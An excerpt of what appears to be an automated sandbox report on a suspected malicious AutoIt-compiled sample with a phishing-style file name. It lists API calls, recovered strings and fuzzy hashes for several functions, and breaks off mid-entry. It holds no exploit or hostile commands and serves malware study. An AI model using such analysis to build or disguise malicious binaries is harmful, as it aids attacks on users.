                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 006579C6
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 006579D1
                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 006579DC
                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 006579E7
                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 006579F2
                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 006579FD
                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00657A08
                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00657A13
                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00657A1E
                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00657A29
                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00657A34
                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00657A3F
                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00657A4A
                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00657A55
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00657A60
                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00657A6B
                                                              • GetCursorInfo.USER32(?), ref: 00657A7B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Cursor$Load$Info
                                                              • String ID:
                                                              • API String ID: 2577412497-0
                                                              • Opcode ID: 0e6d260f9ea54fad4cc28d7241d3cfb877fd12eea90cff8d39f47a76becfdeef
                                                              • Instruction ID: 3401ab6b168dbc5999f395f3c76801c3f2d4be64aac61f0fffe9330eee8acdba
                                                              • Opcode Fuzzy Hash: 0e6d260f9ea54fad4cc28d7241d3cfb877fd12eea90cff8d39f47a76becfdeef
                                                              • Instruction Fuzzy Hash: C83138B0D0831A6ADF509FB69C8999FBFE9FF04750F50452AE50DE7280DA78A5048FA1
                                                              APIs
                                                                • Part of subcall function 0061E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0060C8B7,?,00002000,?,?,00000000,?,0060419E,?,?,?,0069DC00), ref: 0061E984
                                                                • Part of subcall function 0060660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006053B1,?,?,006061FF,?,00000000,00000001,00000000), ref: 0060662F
                                                              • __wsplitpath.LIBCMT ref: 0060C93E
                                                                • Part of subcall function 00621DFC: __wsplitpath_helper.LIBCMT ref: 00621E3C
                                                              • _wcscpy.LIBCMT ref: 0060C953
                                                              • _wcscat.LIBCMT ref: 0060C968
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0060C978
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0060CABE
                                                                • Part of subcall function 0060B337: _wcscpy.LIBCMT ref: 0060B36F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                              • API String ID: 2258743419-1018226102
                                                              • Opcode ID: c0043190ea620237e493b288348577a90e8f634760decd01bb0dce1a67cd0a32
                                                              • Instruction ID: 5afdeb7ecc9707a9f055cb51b0fa36b0e7410a809c085e30ff013b8383799cfc
                                                              • Opcode Fuzzy Hash: c0043190ea620237e493b288348577a90e8f634760decd01bb0dce1a67cd0a32
                                                              • Instruction Fuzzy Hash: 9412DE711483419FC768EF24C881AAFBBE6BF88310F40491EF589933A1DB30DA49DB56
                                                              APIs
                                                              • _memset.LIBCMT ref: 0066CEFB
                                                              • DestroyWindow.USER32(?,?), ref: 0066CF73
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0066CFF4
                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0066D016
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0066D025
                                                              • DestroyWindow.USER32(?), ref: 0066D042
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00600000,00000000), ref: 0066D075
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0066D094
                                                              • GetDesktopWindow.USER32 ref: 0066D0A9
                                                              • GetWindowRect.USER32(00000000), ref: 0066D0B0
                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0066D0C2
                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0066D0DA
                                                                • Part of subcall function 0061B526: GetWindowLongW.USER32(?,000000EB), ref: 0061B537
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                              • String ID: 0$tooltips_class32
                                                              • API String ID: 3877571568-3619404913
                                                              • Opcode ID: 2dc8e5ee22adba3a1840f078d83b7172838fa9f3c54bc21749688ef03fcf5faa
                                                              • Instruction ID: fb3183a3f32bcfc0339d14b63f7eefca3e412e1e150498734890a4fe57a233ce
                                                              • Opcode Fuzzy Hash: 2dc8e5ee22adba3a1840f078d83b7172838fa9f3c54bc21749688ef03fcf5faa
                                                              • Instruction Fuzzy Hash: 81719C70640245AFD724CF28CC85FB677E6EB89708F04461DF9858B3A1D771E942CB62
                                                              APIs
                                                                • Part of subcall function 0061B34E: GetWindowLongW.USER32(?,000000EB), ref: 0061B35F
                                                              • DragQueryPoint.SHELL32(?,?), ref: 0066F37A
                                                                • Part of subcall function 0066D7DE: ClientToScreen.USER32(?,?), ref: 0066D807
                                                                • Part of subcall function 0066D7DE: GetWindowRect.USER32(?,?), ref: 0066D87D
                                                                • Part of subcall function 0066D7DE: PtInRect.USER32(?,?,0066ED5A), ref: 0066D88D
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0066F3E3
                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0066F3EE
                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0066F411
                                                              • _wcscat.LIBCMT ref: 0066F441
                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0066F458
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0066F471
                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0066F488
                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0066F4AA
                                                              • DragFinish.SHELL32(?), ref: 0066F4B1
                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0066F59C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                              • API String ID: 169749273-3440237614
                                                              • Opcode ID: 79ae7cc52dacf0d6fe9f7c463721b10f210565f60e6cc48013becac98113893c
                                                              • Instruction ID: 087214d33d7495f4c7263349c5f6c9a858a55fbba6b6e32dfa47f2c07fcb3402
                                                              • Opcode Fuzzy Hash: 79ae7cc52dacf0d6fe9f7c463721b10f210565f60e6cc48013becac98113893c
                                                              • Instruction Fuzzy Hash: 0A615CB1108304AFC305EF64DC45DAFBBFAEF89710F000A1EF595921A1DB709A49CB62
                                                              APIs
                                                              • VariantInit.OLEAUT32(00000000), ref: 0064AB3D
                                                              • VariantCopy.OLEAUT32(?,?), ref: 0064AB46
                                                              • VariantClear.OLEAUT32(?), ref: 0064AB52
                                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0064AC40
                                                              • __swprintf.LIBCMT ref: 0064AC70
                                                              • VarR8FromDec.OLEAUT32(?,?), ref: 0064AC9C
                                                              • VariantInit.OLEAUT32(?), ref: 0064AD4D
                                                              • SysFreeString.OLEAUT32(00000016), ref: 0064ADDF
                                                              • VariantClear.OLEAUT32(?), ref: 0064AE35
                                                              • VariantClear.OLEAUT32(?), ref: 0064AE44
                                                              • VariantInit.OLEAUT32(00000000), ref: 0064AE80
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                              • API String ID: 3730832054-3931177956
                                                              • Opcode ID: da31e7504c74f80c589aee92ef806a34e565e4abbb93ea5c3a5e10a44e6b8330
                                                              • Instruction ID: b3c2484c6301295a163d4d6000cc352deac495ac416f2e36772e0b0d2e2e13df
                                                              • Opcode Fuzzy Hash: da31e7504c74f80c589aee92ef806a34e565e4abbb93ea5c3a5e10a44e6b8330
                                                              • Instruction Fuzzy Hash: 5BD1ED71A84215FBDB209FA5C885BAEB7B7FF04700F148559E4059B281DB34EC82DBA7
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 006671FC
                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00667247
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: BuffCharMessageSendUpper
                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                              • API String ID: 3974292440-4258414348
                                                              • Opcode ID: 80552db48e85864eeffc9d383fe673ed41e9b2a57d54d3b54a91b07ab5d92c7d
                                                              • Instruction ID: d7734e5a075b8a2b90d2028a6e250d01bbb4d4b7b2b776f6886c2138e552c012
                                                              • Opcode Fuzzy Hash: 80552db48e85864eeffc9d383fe673ed41e9b2a57d54d3b54a91b07ab5d92c7d
                                                              • Instruction Fuzzy Hash: 449161702047029BCB48EF20C851AAEB7A7AF54314F04585DF8966B393DF31ED8ADB95
                                                              APIs
                                                              • EnumChildWindows.USER32(?,0063CF50), ref: 0063CE90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ChildEnumWindows
                                                              • String ID: 4+k$CLASS$CLASSNN$H+k$INSTANCE$L+k$NAME$P+k$REGEXPCLASS$T+k$TEXT
                                                              • API String ID: 3555792229-2149024467
                                                              • Opcode ID: de412a8294e627a2c80d5e7ef3eb057ee0c8bce7f794f0fd74428de057f755d5
                                                              • Instruction ID: 5fe3fcfbdd3f9d586ec12e2cb072eff5551a92d004119622fe39418cb2ad9ad9
                                                              • Opcode Fuzzy Hash: de412a8294e627a2c80d5e7ef3eb057ee0c8bce7f794f0fd74428de057f755d5
                                                              • Instruction Fuzzy Hash: 3E91A270600606AACB58EF60C891BEAFB77BF04310F548519F859B7291DF30A99ACBD4
                                                              APIs
                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0066E5AB
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0066BEAF), ref: 0066E607
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0066E647
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0066E68C
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0066E6C3
                                                              • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0066BEAF), ref: 0066E6CF
                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0066E6DF
                                                              • DestroyIcon.USER32(?,?,?,?,?,0066BEAF), ref: 0066E6EE
                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0066E70B
                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0066E717
                                                                • Part of subcall function 00620FA7: __wcsicmp_l.LIBCMT ref: 00621030
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                              • String ID: .dll$.exe$.icl
                                                              • API String ID: 1212759294-1154884017
                                                              • Opcode ID: 9d56a67b1b503353ad0dfee99a1dc93dabef3490bbb456ddf9a6b45f8a462a79
                                                              • Instruction ID: 5a96cfc16719b8550e7ba2c62af0d9f84d958487b6dcec11fbc955d3269676f0
                                                              • Opcode Fuzzy Hash: 9d56a67b1b503353ad0dfee99a1dc93dabef3490bbb456ddf9a6b45f8a462a79
                                                              • Instruction Fuzzy Hash: AF61E2B1540615BAEB14DF64DC46FFE77BABB18724F104205F911D61D1EB719980CBA0
                                                              APIs
                                                                • Part of subcall function 0060936C: __swprintf.LIBCMT ref: 006093AB
                                                                • Part of subcall function 0060936C: __itow.LIBCMT ref: 006093DF
                                                              • CharLowerBuffW.USER32(?,?), ref: 0064D292
                                                              • GetDriveTypeW.KERNEL32 ref: 0064D2DF
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0064D327
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0064D35E
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0064D38C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                              • API String ID: 1148790751-4113822522
                                                              • Opcode ID: a9b7d98702954143b0ae2e69427499a67265273935d98aaef9f286fad2638748
                                                              • Instruction ID: 83f582d27409ce27d9adfcf6f78423adb04e967583e829652d1d3c64b68c225e
                                                              • Opcode Fuzzy Hash: a9b7d98702954143b0ae2e69427499a67265273935d98aaef9f286fad2638748
                                                              • Instruction Fuzzy Hash: FC517DB1604305AFC744EF20C8819ABB7E6EF98714F10495CF88667291DB31EE45CB92
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00673973,00000016,0000138C,00000016,?,00000016,0069DDB4,00000000,?), ref: 006426F1
                                                              • LoadStringW.USER32(00000000,?,00673973,00000016), ref: 006426FA
                                                              • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00673973,00000016,0000138C,00000016,?,00000016,0069DDB4,00000000,?,00000016), ref: 0064271C
                                                              • LoadStringW.USER32(00000000,?,00673973,00000016), ref: 0064271F
                                                              • __swprintf.LIBCMT ref: 0064276F
                                                              • __swprintf.LIBCMT ref: 00642780
                                                              • _wprintf.LIBCMT ref: 00642829
                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00642840
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                              • API String ID: 618562835-2268648507
                                                              • Opcode ID: e0eabae30798b33bca4d1056f0ed2aa533ccfcbd9418fc1956bdcd58097efd20
                                                              • Instruction ID: fbf438aaac387e0d49dc1455b05acda6479efbcc90682a5ef78dfd50d225f825
                                                              • Opcode Fuzzy Hash: e0eabae30798b33bca4d1056f0ed2aa533ccfcbd9418fc1956bdcd58097efd20
                                                              • Instruction Fuzzy Hash: 03417E72840219BACB58FBE0DD96DEFB37AAF14340F500169B502760D2EA706F49CFA5
                                                              APIs
                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0064D0D8
                                                              • __swprintf.LIBCMT ref: 0064D0FA
                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0064D137
                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0064D15C
                                                              • _memset.LIBCMT ref: 0064D17B
                                                              • _wcsncpy.LIBCMT ref: 0064D1B7
                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0064D1EC
                                                              • CloseHandle.KERNEL32(00000000), ref: 0064D1F7
                                                              • RemoveDirectoryW.KERNEL32(?), ref: 0064D200
                                                              • CloseHandle.KERNEL32(00000000), ref: 0064D20A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                              • String ID: :$\$\??\%s
                                                              • API String ID: 2733774712-3457252023
                                                              • Opcode ID: 09c26939085571d9bc28aeadb55c992f0a740fe4f09990bba34a9d1b43209deb
                                                              • Instruction ID: c6c67d313394e31a719c8620173cafc219fd0ec54e1331d6aa728dd63e365b3c
                                                              • Opcode Fuzzy Hash: 09c26939085571d9bc28aeadb55c992f0a740fe4f09990bba34a9d1b43209deb
                                                              • Instruction Fuzzy Hash: CE3160B2900119ABDB21DFA0DC49FEB77BEAF89740F1041BAF609D21A1E77097458B24
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0066BEF4,?,?), ref: 0066E754
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0066BEF4,?,?,00000000,?), ref: 0066E76B
                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0066BEF4,?,?,00000000,?), ref: 0066E776
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0066BEF4,?,?,00000000,?), ref: 0066E783
                                                              • GlobalLock.KERNEL32(00000000), ref: 0066E78C
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0066BEF4,?,?,00000000,?), ref: 0066E79B
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0066E7A4
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0066BEF4,?,?,00000000,?), ref: 0066E7AB
                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0066BEF4,?,?,00000000,?), ref: 0066E7BC
                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,0068D9BC,?), ref: 0066E7D5
                                                              • GlobalFree.KERNEL32(00000000), ref: 0066E7E5
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0066E809
                                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0066E834
                                                              • DeleteObject.GDI32(00000000), ref: 0066E85C
                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0066E872
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                              • String ID:
                                                              • API String ID: 3840717409-0
                                                              • Opcode ID: cd10562210a66573084aa2e039024dc335170a21d76b5d5e8701d5c13bc0afbf
                                                              • Instruction ID: 70e4f161f04988e66e77fbaee7e5c9dad729e6c1eac173261b7766a45185736c
                                                              • Opcode Fuzzy Hash: cd10562210a66573084aa2e039024dc335170a21d76b5d5e8701d5c13bc0afbf
                                                              • Instruction Fuzzy Hash: 7E410875600208FFDB119F65DC88EAE7BBAEF89725F108168F906D72A0D731AD41DB60
                                                              APIs
                                                              • __wsplitpath.LIBCMT ref: 0065076F
                                                              • _wcscat.LIBCMT ref: 00650787
                                                              • _wcscat.LIBCMT ref: 00650799
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006507AE
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 006507C2
                                                              • GetFileAttributesW.KERNEL32(?), ref: 006507DA
                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 006507F4
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00650806
                                                              Strings
                                                              Memory Dump Source
